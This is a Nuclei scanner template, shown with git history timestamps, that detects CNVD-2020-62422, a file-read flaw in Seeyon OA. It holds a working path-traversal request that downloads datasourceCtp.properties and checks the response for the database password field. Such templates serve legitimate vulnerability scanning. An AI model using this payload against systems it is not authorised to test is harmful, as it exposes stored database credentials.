nuclei-templates/vulnerabilities/other/CNVD-2020-62422.yaml

29 lines
675 B
YAML
Raw Normal View History

2021-01-30 10:45:17 +00:00
id: CNVD-2020-62422
info:
2021-01-30 13:03:26 +00:00
name: Seeyon readfile(CNVD-2020-62422)
2021-01-30 10:45:17 +00:00
author: pikpikcu
severity: medium
2021-01-30 13:03:26 +00:00
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi
2021-01-30 10:45:17 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/x-msdownload"
condition: and
part: header
- type: word
words:
- "ctpDataSource.password"
condition: and
2021-01-30 13:03:26 +00:00
part: body